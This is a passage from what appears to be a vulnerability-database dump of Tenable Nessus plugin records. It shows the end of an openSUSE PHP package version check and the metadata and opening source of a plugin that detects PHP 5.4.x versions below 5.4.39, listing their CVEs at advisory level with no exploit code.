exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_php5-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_php5-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bcmath-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bcmath-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bz2-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bz2-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-calendar-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-calendar-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ctype-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ctype-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-curl-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-curl-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dba-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dba-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-debugsource-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-devel-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dom-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dom-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-enchant-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-enchant-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-exif-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-exif-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fastcgi-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fastcgi-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fileinfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fileinfo-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-firebird-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-firebird-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fpm-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fpm-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ftp-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ftp-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gd-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gd-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gettext-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gettext-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gmp-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gmp-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-iconv-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-iconv-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-imap-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-imap-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-intl-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-intl-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-json-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-json-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ldap-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ldap-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mbstring-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mbstring-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mcrypt-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mcrypt-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mssql-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mssql-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mysql-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mysql-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-odbc-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-odbc-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-openssl-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-openssl-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pcntl-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pcntl-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pdo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pdo-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pear-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pgsql-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pgsql-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-phar-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-phar-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-posix-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-posix-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pspell-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pspell-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-readline-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-readline-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-shmop-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-shmop-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-snmp-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-snmp-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-soap-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-soap-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sockets-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sockets-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sqlite-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sqlite-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-suhosin-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-suhosin-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvmsg-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvmsg-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvsem-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvsem-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvshm-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvshm-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tidy-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tidy-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tokenizer-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tokenizer-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-wddx-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-wddx-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlreader-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlreader-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlrpc-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlrpc-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlwriter-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlwriter-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xsl-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xsl-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zip-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zip-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zlib-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zlib-debuginfo-5.4.20-49.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ctype-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ctype-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debugsource-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-devel-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-exif-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-exif-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ftp-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ftp-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mssql-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mssql-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pear-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pspell-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pspell-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-suhosin-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-suhosin-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zip-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zip-debuginfo-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-5.6.1-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-debuginfo-5.6.1-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:31", "references": ["http://php.net/ChangeLog-5.php#5.4.39", "https://bugs.php.net/bug.php?id=69207", "https://bugs.php.net/bug.php?id=68976"], "pluginID": "82025", "description": "According to its banner, the version of PHP 5.4.x installed on the remote host is prior to 5.4.39. It is, therefore, affected by multiple vulnerabilities :\n\n - A use-after-free error exists related to function 'unserialize', which can allow a remote attacker to execute arbitrary code. Note that this issue is due to an incomplete fix for CVE-2014-8142. (CVE-2015-0231)\n\n - An integer overflow error exists in function 'regcomp' in the Henry Spencer regex library, due to improper validation of user-supplied input. An attacker can exploit this to cause a denial of service or to execute arbitrary code. (CVE-2015-2305)\n\n - An integer overflow error exists in the '_zip_cdir_new' function, due to improper validation of user-supplied input. An attacker, using a crafted ZIP archive, can exploit this to cause a denial of service or to execute arbitrary code. (CVE-2015-2331)\n\n - A filter bypass vulnerability exists due to a flaw in the move_uploaded_file() function in which pathnames are truncated when a NULL byte is encountered. This allows a remote attacker, via a crafted second argument, to bypass intended extension restrictions and create files with unexpected names. (CVE-2015-2348)\n\n - A user-after-free error exists in the process_nested_data() function. This allows a remote attacker, via a crafted unserialize call, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2015-2787)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "edition": 5, "reporter": "Tenable", "published": "2015-03-24T00:00:00", "title": "PHP 5.4.x < 5.4.39 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-2305", "CVE-2015-2331", "CVE-2015-0231"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_4_39.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82025", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82025);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2015-0231\",\n \"CVE-2015-2305\",\n \"CVE-2015-2331\",\n \"CVE-2015-2348\",\n \"CVE-2015-2787\"\n );\n script_bugtraq_id(\n 72539,\n 73182,\n 73381,\n 73383,\n 73385,\n 73431,\n 73434\n );\n\n script_name(english:\"PHP 5.4.x < 5.4.39 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.4.x installed on the\nremote host is prior to 5.4.39. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A use-after-free error exists related to function\n 